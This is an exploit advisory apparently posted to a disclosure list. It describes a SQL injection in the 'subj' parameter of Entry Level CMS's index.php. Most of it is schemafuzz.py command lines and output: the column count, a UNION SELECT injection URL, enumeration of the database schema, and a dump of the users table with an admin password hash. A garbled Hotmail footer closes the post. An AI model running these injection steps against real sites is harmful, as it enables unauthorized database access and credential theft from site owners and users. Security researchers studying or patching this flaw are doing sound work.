[+]Title : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py --==[ Author ]==-- [+] Author : [+] HaMaDa SCoOoRPioN (NEWBIE) [+] Contact : 0u@linuxmail.org [+] Group : The ISLAM OF DEFENDERS AND ATTACK [+] Site : www.islam-defenders.com ******************************************** [Software Information ] [+]SOftware : Entry Level Content Management System (EL CMS) [+]vendor : http://www.entrylevelcms.com/ [+]Vulnerability : SQL Injection ******************************************** [ Vulnerable File ] http://localhost/website/index.php?subj=4 [demo with schemafuzz.py] |--------------------------------------------------------------- | 0u[at]linuxmail[dot]org v5.0 | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ C:Python26exploitschemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol [+] URL:http://localhost/website/index.php?subj=6-- [+] Evasion Used: "+" "--" [+] 03:36:40 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2,3, [+] Column Length is: 4 [+] Found null column at column #: 0 [+] SQLi URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3-- [+] darkc0de URL: http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2 ,3 [-] Done! C:Python26exploitschemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1, 2,3" --full |------------------------------------------------------------ | | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de ,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:33:34 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [Database]: elcms_db [Table: Columns] [0]pages: id,subject_id,menu_name,position,visible,content [1]subjects: id,menu_name,position,visible [2]users: id,username,hashed_password [-] [05:55:27] [-] Total URL Requests 17 [-] Done C:Python26schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1, 2,3" --dump -D elcms_db -T users -C id,username,hashed_password |------------------------------------------------------------ | | 6/2008 schemafuzz.py | -MySQL v5+ Information_schema Database Enumeration | -MySQL v4+ Data Extractor | -MySQL v4+ Table & Column Fuzzer | Usage: schemafuzz.py [options] | -h help darkc0de.com |------------------------------------------------------------ [+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de ,1,2,3-- [+] Evasion Used: "+" "--" [+] 05:35:14 [+] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: vman User: root@localhost Version: 5.0.51a [+] Dumping data from database "vman" Table "users" [+] Column(s) ['id', 'username', 'hashed_password'] [+] Number of Rows: 1 [0] 9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b 8f19f541d436c8: [-] [05:35:15] [-] Total URL Requests 3 [-] Done If you not understand about it [Option/help this tools] schemafuzz.py -h ******************************************** -- Thank YOU BRO HaMaDa SCoOoRPioN www.islam-defenders.com 0u@linuxmail.org ________________________________ Hotmail: ???? ???????? ????? ??? ?????? ?????? Microsoft ?????? ?? ?????? ????????. ????? ????.<https://signup.live.com/signup.aspx?id=60969>